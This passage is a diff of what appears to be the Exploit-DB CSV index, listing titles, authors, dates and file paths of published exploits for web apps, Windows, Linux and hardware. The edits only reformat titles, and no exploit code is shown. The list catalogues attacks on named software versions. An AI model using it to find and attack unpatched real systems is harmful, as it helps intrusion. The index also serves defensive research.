Injection",2009-11-30,s4r4d0,php,webapps,0 33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryid' Parameter Cross-Site Scripting",2009-11-30,SoldierOfAllah,php,webapps,0 -33383,platforms/php/webapps/33383.txt,"Elxis 'filename' Parameter Directory Traversal",2009-11-30,"cr4wl3r ",php,webapps,0 +33383,platforms/php/webapps/33383.txt,"Elxis - 'filename' Parameter Directory Traversal",2009-11-30,"cr4wl3r ",php,webapps,0 33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - DoS PoC",2014-05-16,"Osanda Malith",windows,dos,0 33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0 33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,multiple,dos,0 @@ -30130,13 +30130,13 @@ id,file,description,date,author,platform,type,port 33397,platforms/linux/dos/33397.txt,"MySQL 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0 33398,platforms/linux/dos/33398.txt,"MySQL 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 -33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 +33400,platforms/php/webapps/33400.txt,"Ez Cart - 'sid' Parameter Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting",2009-12-22,"Edgard Chammas",php,webapps,0 33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 - 'MSP' Script Cross-Site Scripting",2009-12-23,"Floyd Fuh",multiple,webapps,0 33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting",2009-12-24,"Steven Abbagnaro",php,webapps,0 -33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 +33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus - 'controller' Parameter Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps,0 33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0 33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter XSS",2009-12-28,Global-Evolution,php,webapps,0 @@ -30172,14 +30172,14 @@ id,file,description,date,author,platform,type,port 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck and Globus",php,webapps,0 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injection / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 -33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0 +33478,platforms/php/webapps/33478.txt,"Joomla! Jobads - 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0 33479,platforms/osx/dos/33479.c,"Mac OS X 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting",2010-01-09,Cyber_945,asp,webapps,0 33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Parameter Cross-Site Scripting",2010-01-10,"ViRuSMaN ",php,webapps,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos,0 33484,platforms/php/webapps/33484.txt,"DeltaScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 -33485,platforms/php/webapps/33485.txt,"Jamit Job Board 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 +33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PhPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Variable Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 @@ -30204,7 +30204,7 @@ id,file,description,date,author,platform,type,port 33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting",2010-01-12,Sora,php,webapps,0 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0 33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component - 'categoria' Parameter Cross-Site Scripting",2010-01-13,FL0RiX,php,webapps,0 -33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross-Site Scripting",2010-01-13,"ViRuSMaN ",php,webapps,0 +33510,platforms/php/webapps/33510.txt,"Tribisur - 'cat' Parameter Cross-Site Scripting",2010-01-13,"ViRuSMaN ",php,webapps,0 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection",2010-01-14,"nGenuity Information Services",multiple,webapps,0 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 @@ -30319,14 +30319,14 @@ id,file,description,date,author,platform,type,port 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 33649,platforms/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Parameter Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,php,webapps,0 -33650,platforms/php/webapps/33650.txt,"Extreme Mobster 'login' Parameter Cross-Site Scripting",2010-02-16,indoushka,php,webapps,0 +33650,platforms/php/webapps/33650.txt,"Extreme Mobster - 'login' Parameter Cross-Site Scripting",2010-02-16,indoushka,php,webapps,0 33651,platforms/php/webapps/33651.txt,"EziScript Google Page Rank 1.1 - Cross-Site Scripting",2010-02-16,sarabande,php,webapps,0 33652,platforms/php/webapps/33652.txt,"New-CMS 1.08 - Multiple Local File Inclusion and HTML-Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps,0 33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Parameter Cross-Site Scripting",2010-02-18,"George Christopoulos",multiple,remote,0 33654,platforms/php/webapps/33654.py,"Madness Pro 1.14 - Persistent XSS",2014-06-06,bwall,php,webapps,0 33655,platforms/php/webapps/33655.py,"Madness Pro 1.14 - SQL Injection",2014-06-06,bwall,php,webapps,0 33656,platforms/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 - 'archive.php' SQL Injection",2010-02-18,"AmnPardaz Security Research Team",php,webapps,0 -33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI 'message' Parameter Cross-Site Scripting",2010-02-18,thebluegenius,php,webapps,0 +33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI - 'message' Parameter Cross-Site Scripting",2010-02-18,thebluegenius,php,webapps,0 33658,platforms/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,php,webapps,0 33659,platforms/php/webapps/33659.txt,"Joomla! 'com_recipe' Component Multiple SQL Injection",2010-02-20,FL0RiX,php,webapps,0 33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0 @@ -30334,14 +30334,14 @@ id,file,description,date,author,platform,type,port 33662,platforms/windows/remote/33662.txt,"WampServer 2.0i lang Parameter Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 -33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 +33665,platforms/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow PoC",2014-06-11,"Gabor Seljan",windows,dos,0 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass",2010-02-25,JIKO,php,webapps,0 33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0 33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 - 'wflogin.jsp' Cross-Site Scripting",2010-02-26,"Yaniv Miron",jsp,webapps,0 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0 -33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection",2010-02-24,kaMtiEz,php,webapps,0 +33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! - 'id' Parameter SQL Injection",2010-02-24,kaMtiEz,php,webapps,0 33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusion",2010-02-24,JIKO,php,webapps,0 33679,platforms/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting",2010-02-28,snakespc,php,webapps,0 33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Inclusion",2010-02-28,"cr4wl3r ",php,webapps,0 @@ -30366,8 +30366,8 @@ id,file,description,date,author,platform,type,port 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id param) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 33714,platforms/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Stored XSS",2014-06-11,rob222,php,webapps,0 -33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS 'pojam' Parameter Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 -33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem 'id' Parameter Local File Inclusion",2010-03-05,"cr4wl3r ",php,webapps,0 +33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS - 'pojam' Parameter Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 +33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem - 'id' Parameter Local File Inclusion",2010-03-05,"cr4wl3r ",php,webapps,0 33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,multiple,webapps,0 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,windows,dos,0 33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - (.mp3) Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos,0 @@ -30393,7 +30393,7 @@ id,file,description,date,author,platform,type,port 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE/XSS Injection Exploit",2014-06-13,"BLacK ZeRo",aix,webapps,0 33737,platforms/hardware/dos/33737.py,"ZTE and TP-Link RomPager - DoS Exploit",2014-06-13,"Osanda Malith",hardware,dos,0 33760,platforms/multiple/webapps/33760.txt,"Multiple Products 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0 -33761,platforms/asp/webapps/33761.txt,"Pars CMS 'RP' Parameter Multiple SQL Injection",2010-03-15,Isfahan,asp,webapps,0 +33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injection",2010-03-15,Isfahan,asp,webapps,0 33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33740,platforms/hardware/remote/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 @@ -30441,7 +30441,7 @@ id,file,description,date,author,platform,type,port 33790,platforms/windows/remote/33790.rb,"Easy File Management Web Server Stack Buffer Overflow",2014-06-17,Metasploit,windows,remote,80 33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit",2014-06-17,Metasploit,arm,local,0 33792,platforms/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - CSRF",2014-06-17,"Blessen Thomas",hardware,webapps,0 -33793,platforms/php/webapps/33793.txt,"Kasseler CMS News Module 'id' Parameter SQL Injection",2010-03-23,Palyo34,php,webapps,0 +33793,platforms/php/webapps/33793.txt,"Kasseler CMS News Module - 'id' Parameter SQL Injection",2010-03-23,Palyo34,php,webapps,0 33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 33795,platforms/php/webapps/33795.txt,"Joomla! 'com_aml_2' Component - 'art' Parameter SQL Injection",2010-03-23,Metropolis,php,webapps,0 33796,platforms/php/webapps/33796.txt,"Joomla! 'com_cb' Component - 'cat' Parameter SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 @@ -30475,18 +30475,18 @@ id,file,description,date,author,platform,type,port 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal",2010-06-20,chr1x,windows,remote,0 33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Parameter Cross-Site Scripting",2010-04-19,anT!-Tr0J4n,php,webapps,0 33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 -33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS 'id' Parameter Unspecified Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",asp,webapps,0 +33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS - 'id' Parameter Unspecified Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0 33827,platforms/php/webapps/33827.txt,"Istgah For Centerhost 'view_ad.php' Cross-Site Scripting",2010-04-07,indoushka,php,webapps,0 33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor PNG File Buffer Overflow",2010-04-09,eidelweiss,windows,remote,0 33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - CSRF / Stored XSS",2014-06-21,LiquidWorm,php,webapps,0 33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0 33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 -33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 +33834,platforms/php/webapps/33834.txt,"Vana CMS - 'filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusion",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 33836,platforms/windows/shellcode/33836.txt,"Windows - Add Admin User _BroK3n_ Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0 -33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 +33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS - 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass / Denial of Service",2010-04-19,"Luigi Auriemma",windows,remote,0 33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,Metasploit,windows,remote,0 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 @@ -30503,7 +30503,7 @@ id,file,description,date,author,platform,type,port 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0 33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting",2010-04-24,Liscker,php,webapps,0 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0 -33856,platforms/php/webapps/33856.txt,"Viennabux Beta! 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0 +33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0 34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - MBM File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0 34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0 @@ -30519,7 +30519,7 @@ id,file,description,date,author,platform,type,port 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Parameter Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 -33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection",2010-04-25,"Aung Khant",multiple,remote,0 +33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Parameter URI Redirection",2010-04-25,"Aung Khant",multiple,remote,0 33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Security Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 33875,platforms/php/webapps/33875.txt,"HuronCMS 'index.php' Multiple SQL Injection",2010-03-30,mat,php,webapps,0 33876,platforms/multiple/dos/33876.c,"NovaSTOR NovaNET 11.0 - Remote DoS / arbitrary memory read",2007-09-14,mu-b,multiple,dos,0 @@ -30593,7 +30593,7 @@ id,file,description,date,author,platform,type,port 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,"cr4wl3r ",php,webapps,0 33937,platforms/multiple/webapps/33937.txt,"TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 -33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0 +33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0 33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,"cp77fk4r ",java,webapps,0 33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 @@ -30602,7 +30602,7 @@ id,file,description,date,author,platform,type,port 33944,platforms/windows/remote/33944.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)",2014-07-01,sickness,windows,remote,0 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",php,webapps,0 33946,platforms/php/webapps/33946.txt,"EmiratesHost Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,php,webapps,0 -33947,platforms/php/webapps/33947.txt,"Last Wizardz 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",php,webapps,0 +33947,platforms/php/webapps/33947.txt,"Last Wizardz - 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",php,webapps,0 33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 - 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",cfm,webapps,0 33949,platforms/linux/remote/33949.txt,"PCRE 6.2 Regular Expression Compiling Workspace Buffer Overflow",2010-05-06,"Michael Santos",linux,remote,0 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection",2010-01-31,s4r4d0,php,webapps,0 @@ -30701,12 +30701,12 @@ id,file,description,date,author,platform,type,port 34071,platforms/php/webapps/34071.txt,"Joomla! 'com_sar_news' Component - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 -34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 +34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 -34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 +34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0 34078,platforms/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,php,webapps,0 34079,platforms/php/webapps/34079.txt,"Sniggabo CMS 2.21 - 'search.php' Cross-Site Scripting",2010-01-06,Sora,php,webapps,0 @@ -30775,7 +30775,7 @@ id,file,description,date,author,platform,type,port 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (64-bit) - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0 -34166,platforms/php/webapps/34166.txt,"KubeSupport 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 +34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 34167,platforms/win_x86/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,Metasploit,win_x86,local,0 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0 @@ -30840,7 +30840,7 @@ id,file,description,date,author,platform,type,port 34233,platforms/windows/dos/34233.py,"Sumatra PDF 1.1 - Denial Of Service",2010-07-01,"Azim Poonawala",windows,dos,0 34234,platforms/php/webapps/34234.txt,"Flatnux 2010-06.09 - 'find' Parameter Cross-Site Scripting",2010-07-01,ITSecTeam,php,webapps,0 34235,platforms/php/webapps/34235.txt,"Wiki Web Help 0.2.7 - Cross-Site Scripting / HTML Injection",2010-07-01,"John Leitch",php,webapps,0 -34236,platforms/php/webapps/34236.txt,"ReCMS 'users_lang' Parameter Directory Traversal",2010-07-01,Locu,php,webapps,0 +34236,platforms/php/webapps/34236.txt,"ReCMS - 'users_lang' Parameter Directory Traversal",2010-07-01,Locu,php,webapps,0 34237,platforms/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting",2010-07-02,"Marcos Garcia and Maximiliano Soler",multiple,webapps,0 34238,platforms/php/webapps/34238.txt,"Sphider Search Engine - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 34239,platforms/php/webapps/34239.txt,"Status2k Server Monitoring Software - Multiple Vulnerabilities",2014-08-02,"Shayan S",php,webapps,80 @@ -30936,7 +30936,7 @@ id,file,description,date,author,platform,type,port 34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection",2009-12-17,bi0,asp,webapps,0 -34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0 +34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site 